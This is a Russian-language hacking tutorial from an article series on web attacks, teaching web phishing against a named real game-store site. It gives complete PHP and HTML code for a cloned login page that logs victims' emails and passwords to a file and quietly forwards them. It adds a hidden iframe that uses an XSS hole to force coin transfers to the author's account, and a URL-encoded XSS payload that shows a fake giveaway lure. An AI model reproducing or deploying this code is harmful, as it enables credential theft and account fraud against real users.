• Поиск
  • Кодер HEX
  • Чекер proxy
  • CSRF/XSS форма

ЦИКЛЫ СТАТЕЙ:

  • 4. SHELL
  • 4.1. ANDROID SHELL
  • 4.2. WINDOWS. КОМАНДНАЯ СТРОКА
  • 4.3. LINUX. UNIX SHELL
  • 4.4. SHELL НЕ БЕЗ METASPLOIT
  • 4.5. WEB SHELL

WEB-ФИШИНГ

Фишинг — один из самых простых и потрясающе быстрых методов получить персональные данные пользователя. Метод заключается в том, чтобы направить пользователя на фишинговый сайт, который является копией легитимного, но со своей изюминкой. Изюминка состоит в том, что собирает все данные о пользователе. В схеме самое необходимое — продумать всё до мелочей. Начнём.

ЦИКЛ СТАТЕЙ WEBHACK

  1. XSS НА ОЩУПЬ
  2. WEB-ФИШИНГ
  3. ВМЕШИВАЕМСЯ В PHP
  4. SQL-ИНЪЕКЦИИ
  5. BURP SUITE

ТЕОРИЯ

Что предстоит сделать:

  1. Определить целью и найти её изъяны.
  2. Создать копию цели со всеми ссылками и картинками.
  3. Добавить свой код.
  4. Разместить страницу на хостинге.
  5. Заманить пользователя на сайт.

Я взял для примера личный кабинет игрового сервера с большим кол-вом доверчивых пользователей — store.hcs.land. В одной из форм в личном кабинете я нашёл XSS в поле, которое вообще не фильтрует поступающую информацию и отображает её после отправки в теле документа. Значит будем её использовать в своих целях. Рекомендую почитать прошлую статью из цикла WEBHACK о XSS, чтобы понимать как это происходит на примере этого же сайта.

Далее будет описан способ:

  1. Используем XSS в личном кабинете:
    1. Разместим интересную ссылку для пользователя.
    2. Автоматически отправим монеты при переходе на фишинговую страницу.
  2. Создадим фишинговую страницу для сбора учёток.

ПРАКТИКА

  1. Заходим из бразуера Chrome или FireFox на сайт store.hcs.land/index.php?request=login и нажимаем правой кнопкой мыши по пустому месту — Сохранить как, сохраняем в удобное место под именем index.php. Это будет основой нашей фишинговой страницы.
  2. Открываем index.php и ищем тег
    1
    <form ...>

    Меняем его на:

    1
    <form class="m-t" role="form" method="post" action="login.php">
  3. Далее добавляем код перед тегом , который будет отправлять монеты на другую учётку:
    1
    <iframe style="display:none;" src='https://store.hcs.land/index.php?request=wallet&tt=<form method="post"><input type="text"name="tusername"value="abouthack"><input type="text"name="tmoney"value="<?php $money = $_GET['id'];print($money);?>"><button type="submit"id="form"></form><script>document.getElementById("form").click();</script>'></iframe>

    Заметьте, что здесь есть php код, который ждёт, чтобы ему передали кол-во монет. То есть если исполнить в адресной строке «http://h0stname.cf/hcs/index.php?id=1000», то пользователю abouthack передастся 1000 монет(если они есть).

  4. Теперь создаём новый текстовый файл и переименовываем его на login.php. Открываем и копируем в него следующий код:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <?php
    // Получаем данные с формы:
    $email = $_POST['email'];
    $passw = $_POST['password'];
    // Формируем лог-запись:
    $emailpass = $email.";".$passw;
    // Открываем файл и производим запись:
    /*$file = fopen("log.txt", a);
    fwrite($file, $log*/

    fwrite(fopen("emailpass.txt", a),$emailpass."\n");

    /* Далее создаём невидимую форму с уже запомнеными значениями, и отправляем
    на js её снова на легитимный сайт, дабы пользователь как ни в чем не бывало
    залогинился и ничего не заподозрил. */

    ?>
    <form method="post" action="https://store.hcs.land/index.php?request=login" style="display:none;">
    <input type="text" name="email" value="<?php print($email); ?>">
    <input type="text" name="password" value="<?php print($passw); ?>">
    <button type="submit" id="form">
    </form>
    <script>document.getElementById("form").click();</script>

    Я написал комментарии, чтобы было понятно что здесь происходит. Вот и фишинговая страница создана.

  5. Чтобы страница работала — надо её разместить на хостинге. Описывать данную процедуру не буду. На этом сайте есть статья с информацией о бесплатных хостингах.
  6. Теперь осталось заманить пользователя на сайт. Но как это сделать? Есть разные варианты: спам, скинуть ссылку при общении, дать рекламу, подменить на легитимном сайте ссылку и др. Выбор заканчивается вашей изобретательностью и возможностями. Здесь мы будем пользоваться XSS — вставим ссылку на легитимном сайте и скинем её пользователю(себе). Но чтобы она менее палевно выглядела, то её придётся декодировать с помощью этого скрипта.
    Наша ссылка будет выглядеть так:

    1
    2
    3
    4
    <!-- до кодирования -->
    https://store.hcs.land/index.php?request=wallet&tt=<div style="position:fixed;width:100%;height:100%;right:0;bottom:0;background:rgba(0,0,0,0.5);z-index:9999;display:flex;"><a style="margin:auto;padding:30px;background:#1ab394;color:#fff;border-radius:5px;" href="http://h0stname.cf/hcs/index.php">Мы проводим конкурс на раздачу 100 лк!<br>Поучавствуй и ты!</a></div>
    <!-- после кодирования -->
    https://store.hcs.land/index.php?request=wallet&tt=%3c%64%69%76%20%73%74%79%6c%65%3d%22%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%77%69%64%74%68%3a%31%30%30%25%3b%68%65%69%67%68%74%3a%31%30%30%25%3b%72%69%67%68%74%3a%30%3b%62%6f%74%74%6f%6d%3a%30%3b%62%61%63%6b%67%72%6f%75%6e%64%3a%72%67%62%61%28%30%2c%30%2c%30%2c%30%2e%35%29%3b%7a%2d%69%6e%64%65%78%3a%39%39%39%39%3b%64%69%73%70%6c%61%79%3a%66%6c%65%78%3b%22%3e%3c%61%20%73%74%79%6c%65%3d%22%6d%61%72%67%69%6e%3a%61%75%74%6f%3b%70%61%64%64%69%6e%67%3a%33%30%70%78%3b%62%61%63%6b%67%72%6f%75%6e%64%3a%23%31%61%62%33%39%34%3b%63%6f%6c%6f%72%3a%23%66%66%66%3b%62%6f%72%64%65%72%2d%72%61%64%69%75%73%3a%35%70%78%3b%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%68%30%73%74%6e%61%6d%65%2e%63%66%2f%68%63%73%2f%69%6e%64%65%78%2e%70%68%70%22%3e%d0%9c%d1%8b%20%d0%bf%d1%80%d0%be%d0%b2%d0%be%d0%b4%d0%b8%d0%bc%20%d0%ba%d0%be%d0%bd%d0%ba%d1%83%d1%80%d1%81%20%d0%bd%d0%b0%20%d1%80%d0%b0%d0%b7%d0%b4%d0%b0%d1%87%d1%83%20%31%30%30%20%d0%bb%d0%ba%21%3c%62%72%3e%d0%9f%d0%be%d1%83%d1%87%d0%b0%d0%b2%d1%81%d1%82%d0%b2%d1%83%d0%b9%20%d0%b8%20%d1%82%d1%8b%21%3c%2f%61%3e%3c%2f%64%69%76%3e

    Думаю сразу понятна разница в доверии к этим ссылкам. На этом всё.

Теги:

Автор: